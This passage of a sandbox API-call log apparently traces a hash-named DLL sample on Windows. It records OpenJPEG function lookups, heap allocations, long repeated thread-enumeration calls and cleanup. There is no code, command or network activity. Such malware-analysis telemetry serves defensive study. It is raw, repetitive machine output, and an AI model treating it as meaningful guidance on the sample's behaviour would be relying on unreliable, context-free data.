(lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0151.426] GetProcessHeap () returned 0x520000 [0151.426] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2d65030 | out: hHeap=0x520000) returned 1 [0151.435] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0151.435] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0151.436] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1000) returned 0x2d65030 [0151.437] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2c) returned 0x52e480 [0151.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_create_decompress", cchWideChar=-1, lpMultiByteStr=0x52e480, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_create_decompress", lpUsedDefaultChar=0x0) returned 22 [0151.437] GetLastError () returned 0x0 [0151.437] SetLastError (dwErrCode=0x0) [0151.438] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_create_decompressW") returned 0x0 [0151.438] GetLastError () returned 0x7f [0151.438] SetLastError (dwErrCode=0x7f) [0151.438] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_create_decompressA") returned 0x0 [0151.438] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_create_decompress") returned 0x7ffc45f19710 [0151.438] GetActiveWindow () returned 0x0 [0151.438] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xb8) returned 0x524880 [0151.438] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x148) returned 0x52ac50 [0151.438] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1640) returned 0x2d66040 [0151.439] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3e8) returned 0x2e10080 [0151.439] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x38) returned 0x52e4c0 [0151.439] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x960) returned 0x2e10470 [0151.439] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x10) returned 0x539900 [0151.439] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x50) returned 0x2d64e50 [0151.439] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x10) returned 0x539700 [0151.439] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x50) returned 0x2d648b0 [0151.440] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x58) returned 0x2d647f0 [0151.440] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x10) returned 0x539940 [0151.440] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2d65030 | out: hHeap=0x520000) returned 1 [0151.440] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52e480 | out: hHeap=0x520000) returned 1 [0151.440] GetCurrentProcessId () returned 0x11a4 [0151.440] GetCurrentThreadId () returned 0x11ac [0151.440] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0151.449] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.450] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.543] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.543] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.544] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.544] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.547] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.654] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.654] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.655] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.655] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.656] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.657] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.657] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.658] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.658] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.668] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.669] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.670] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.749] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.749] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.836] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.837] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.838] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.838] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.840] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.840] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.842] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.864] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.864] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.866] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.866] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.869] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.869] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0151.871] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.032] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.033] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.033] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.034] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.035] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.036] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.037] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.038] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.039] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.039] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.040] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.041] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.042] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.043] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.043] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.044] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.045] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.045] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.046] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.047] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.047] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.048] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.050] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.051] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.052] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.052] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.053] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.054] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.054] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.055] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.056] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.056] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.057] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.058] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.059] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.059] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.060] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.063] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.063] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.064] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.065] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.066] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.066] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.067] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.068] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.149] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.151] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0152.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0185.691] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0185.702] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0188.706] FreeLibrary (hLibModule=0x7ffc45e90000) returned 1 [0188.711] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0188.711] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0188.711] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0188.711] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0188.712] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0188.712] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x537790 | out: hHeap=0x520000) returned 1 [0188.713] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52af80 | out: hHeap=0x520000) returned 1 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52e0c0 | out: hHeap=0x520000) returned 1 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52e100 | out: hHeap=0x520000) returned 1 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5313f0 | out: hHeap=0x520000) returned 1 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52e180 | out: hHeap=0x520000) returned 1 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x523fb0 | out: hHeap=0x520000) returned 1 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52b220 | out: hHeap=0x520000) returned 1 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5294a0 | out: hHeap=0x520000) returned 1 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52b160 | out: hHeap=0x520000) returned 1 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52e580 | out: hHeap=0x520000) returned 1 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x524090 | out: hHeap=0x520000) returned 1 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5225f0 | out: hHeap=0x520000) returned 1 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52c310 | out: hHeap=0x520000) returned 1 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5220d0 | out: hHeap=0x520000) returned 1 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5312b0 | out: hHeap=0x520000) returned 1 [0188.713] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52afe0 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x530e50 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52c330 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x522150 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52b520 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52b040 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52e2c0 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52b070 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x524b40 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x522170 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x524810 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x524830 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52e340 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52e380 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x524580 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52b250 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539800 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52b1f0 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539960 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x529b90 | out: hHeap=0x520000) returned 1 [0188.714] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x524400 | out: hHeap=0x520000) returned 1 [0188.716] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x536580 | out: hHeap=0x520000) returned 1 